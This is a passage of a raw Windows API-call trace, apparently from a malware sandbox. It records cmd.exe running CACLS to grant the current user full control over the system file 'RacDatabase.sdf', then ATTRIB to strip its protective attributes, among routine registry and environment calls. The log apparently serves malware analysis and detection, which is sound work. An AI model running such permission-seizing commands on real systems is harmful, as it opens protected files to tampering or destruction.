FreeEnvironmentStringsW (penv=0x360240) returned 1 [0126.538] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ec04 | out: phkResult=0x22ec04*=0x40) returned 0x0 [0126.538] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x0, lpData=0x22ec10*=0xf0, lpcbData=0x22ec08*=0x1000) returned 0x2 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x4, 
lpData=0x22ec10*=0x1, lpcbData=0x22ec08*=0x4) returned 0x0 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x0, lpData=0x22ec10*=0x1, lpcbData=0x22ec08*=0x1000) returned 0x2 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x4, lpData=0x22ec10*=0x0, lpcbData=0x22ec08*=0x4) returned 0x0 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x4, lpData=0x22ec10*=0x40, lpcbData=0x22ec08*=0x4) returned 0x0 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x4, lpData=0x22ec10*=0x40, lpcbData=0x22ec08*=0x4) returned 0x0 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x0, lpData=0x22ec10*=0x40, lpcbData=0x22ec08*=0x1000) returned 0x2 [0126.539] RegCloseKey (hKey=0x40) returned 0x0 [0126.539] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ec04 | out: phkResult=0x22ec04*=0x40) returned 0x0 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x0, lpData=0x22ec10*=0x40, lpcbData=0x22ec08*=0x1000) returned 0x2 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x4, lpData=0x22ec10*=0x1, lpcbData=0x22ec08*=0x4) returned 0x0 [0126.539] 
RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x0, lpData=0x22ec10*=0x1, lpcbData=0x22ec08*=0x1000) returned 0x2 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x4, lpData=0x22ec10*=0x0, lpcbData=0x22ec08*=0x4) returned 0x0 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x4, lpData=0x22ec10*=0x9, lpcbData=0x22ec08*=0x4) returned 0x0 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x4, lpData=0x22ec10*=0x9, lpcbData=0x22ec08*=0x4) returned 0x0 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x0, lpData=0x22ec10*=0x9, lpcbData=0x22ec08*=0x1000) returned 0x2 [0126.539] RegCloseKey (hKey=0x40) returned 0x0 [0126.539] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886361 [0126.539] srand (_Seed=0x5b886361) [0126.539] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\"" [0126.539] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\"" [0126.540] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 
[0126.540] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3619a0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0126.540] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0126.540] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0126.540] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0126.540] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0126.540] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0126.540] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0126.540] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0126.540] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0126.540] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0126.540] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0126.541] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0126.541] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0126.541] GetEnvironmentStringsW () returned 0x362390* [0126.541] FreeEnvironmentStringsW (penv=0x362390) returned 1 [0126.541] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0126.541] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0126.541] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0126.541] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0126.541] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") 
returned 8 [0126.541] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0126.541] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0126.541] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0126.541] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0126.541] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0126.541] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f9d0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0126.541] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f9d0, lpFilePart=0x22f9cc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f9cc*="Desktop") returned 0x18 [0126.541] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0126.542] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f74c | out: lpFindFileData=0x22f74c) returned 0x3600d0 [0126.542] FindClose (in: hFindFile=0x3600d0 | out: hFindFile=0x3600d0) returned 1 [0126.542] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f74c | out: lpFindFileData=0x22f74c) returned 0x3600d0 [0126.542] FindClose (in: hFindFile=0x3600d0 | out: hFindFile=0x3600d0) returned 1 [0126.542] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f74c | out: lpFindFileData=0x22f74c) returned 0x3600d0 [0126.542] FindClose (in: hFindFile=0x3600d0 | out: hFindFile=0x3600d0) returned 1 [0126.542] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0126.542] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0126.542] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0126.542] GetEnvironmentStringsW () returned 0x362bb0* [0126.543] FreeEnvironmentStringsW (penv=0x362bb0) 
returned 1 [0126.543] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0126.543] GetConsoleOutputCP () returned 0x1b5 [0126.570] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0126.570] GetUserDefaultLCID () returned 0x409 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fb10, cchData=128 | out: lpLCData="0") returned 2 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fb10, cchData=128 | out: lpLCData="0") returned 2 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fb10, cchData=128 | out: lpLCData="1") returned 2 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, 
lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0126.571] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0126.572] GetConsoleTitleW (in: lpConsoleTitle=0x350958, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0126.572] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0126.573] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0126.573] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0126.573] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0126.573] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0126.574] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0126.574] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0126.574] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0126.574] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0126.574] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0126.574] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0126.574] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0126.576] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0126.576] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0126.576] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0126.576] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0126.576] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0126.576] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0126.576] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0126.578] GetConsoleTitleW (in: lpConsoleTitle=0x22f7a4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0126.578] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0126.578] _wcsicmp (_String1="CACLS", 
_String2="ERASE") returned -2 [0126.578] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0126.578] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0126.578] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0126.578] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0126.578] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0126.578] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0126.578] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0126.578] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0126.578] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0126.578] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0126.578] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0126.578] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0126.578] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0126.578] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0126.579] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0126.579] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0126.579] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0126.579] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0126.579] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0126.579] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0126.579] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0126.579] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0126.579] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0126.579] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0126.579] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0126.579] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0126.579] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0126.579] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0126.579] _wcsicmp (_String1="CACLS", 
_String2="TITLE") returned -17 [0126.579] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0126.579] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0126.579] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0126.579] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0126.579] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0126.579] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0126.579] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0126.579] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0126.579] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0126.579] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0126.579] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0126.579] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0126.579] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0126.579] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0126.579] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0126.579] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0126.579] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0126.579] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0126.579] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0126.579] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0126.579] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0126.579] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0126.579] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0126.579] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0126.580] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0126.580] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0126.580] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0126.580] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0126.580] _wcsicmp (_String1="CACLS", 
_String2="RD") returned -15 [0126.580] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0126.580] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0126.580] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0126.580] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0126.580] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0126.580] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0126.580] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0126.580] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0126.580] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0126.580] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0126.580] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0126.580] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0126.580] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0126.580] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0126.580] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0126.580] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0126.580] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0126.580] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0126.580] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0126.580] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0126.580] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0126.580] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0126.580] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0126.580] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0126.580] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0126.580] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0126.580] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0126.581] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0126.581] 
SetErrorMode (uMode=0x0) returned 0x0 [0126.581] SetErrorMode (uMode=0x1) returned 0x0 [0126.581] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x361dd0, lpFilePart=0x22f2c4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f2c4*="Desktop") returned 0x18 [0126.581] SetErrorMode (uMode=0x0) returned 0x1 [0126.581] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0126.581] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0126.588] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0126.588] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x22f040, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f040) returned 0xffffffff [0126.589] GetLastError () returned 0x2 [0126.589] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x22f040, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f040) returned 0xffffffff [0126.589] GetLastError () returned 0x2 [0126.589] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x22f040, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f040) returned 0x350ee8 [0126.589] FindClose (in: hFindFile=0x350ee8 | out: hFindFile=0x350ee8) returned 1 [0126.589] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x22f040, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f040) returned 0xffffffff [0126.589] GetLastError () returned 0x2 [0126.589] FindFirstFileExW (in: 
lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x22f040, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f040) returned 0x350ee8 [0126.590] FindClose (in: hFindFile=0x350ee8 | out: hFindFile=0x350ee8) returned 1 [0126.590] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0126.590] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0126.590] GetConsoleTitleW (in: lpConsoleTitle=0x22f538, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0126.590] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f3c0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f488 | out: lpAttributeList=0x22f3c0, lpSize=0x22f488) returned 1 [0126.590] UpdateProcThreadAttribute (in: lpAttributeList=0x22f3c0, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f480, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f3c0, lpPreviousValue=0x0) returned 1 [0126.590] GetStartupInfoW (in: lpStartupInfo=0x22f37c | out: lpStartupInfo=0x22f37c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0126.590] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0126.591] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22f41c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\" /E /G EEBsYm5:F 
/C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f468 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x22f468*(hProcess=0x50, hThread=0x4c, dwProcessId=0xfac, dwThreadId=0xfb0)) returned 1 [0126.598] CloseHandle (hObject=0x4c) returned 1 [0126.598] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0126.598] GetEnvironmentStringsW () returned 0x360240* [0126.598] FreeEnvironmentStringsW (penv=0x360240) returned 1 [0126.598] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0126.640] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x22f35c | out: lpExitCode=0x22f35c*=0x0) returned 1 [0126.640] CloseHandle (hObject=0x50) returned 1 [0126.640] _vsnwprintf (in: _Buffer=0x22f4a4, _BufferCount=0x13, _Format="%08X", _ArgList=0x22f368 | out: _Buffer="00000000") returned 8 [0126.640] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0126.640] GetEnvironmentStringsW () returned 0x3622f8* [0126.640] FreeEnvironmentStringsW (penv=0x3622f8) returned 1 [0126.640] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0126.640] GetEnvironmentStringsW () returned 0x3622f8* [0126.640] FreeEnvironmentStringsW (penv=0x3622f8) returned 1 [0126.641] DeleteProcThreadAttributeList (in: lpAttributeList=0x22f3c0 | out: lpAttributeList=0x22f3c0) [0126.641] GetConsoleTitleW (in: lpConsoleTitle=0x22f7a4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0126.641] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 
[0126.641] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0126.641] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0126.641] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x22f040, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f040) returned 0xffffffff [0126.641] GetLastError () returned 0x2 [0126.641] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x22f040, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f040) returned 0xffffffff [0126.642] GetLastError () returned 0x2 [0126.642] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x22f040, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f040) returned 0x35e448 [0126.642] FindClose (in: 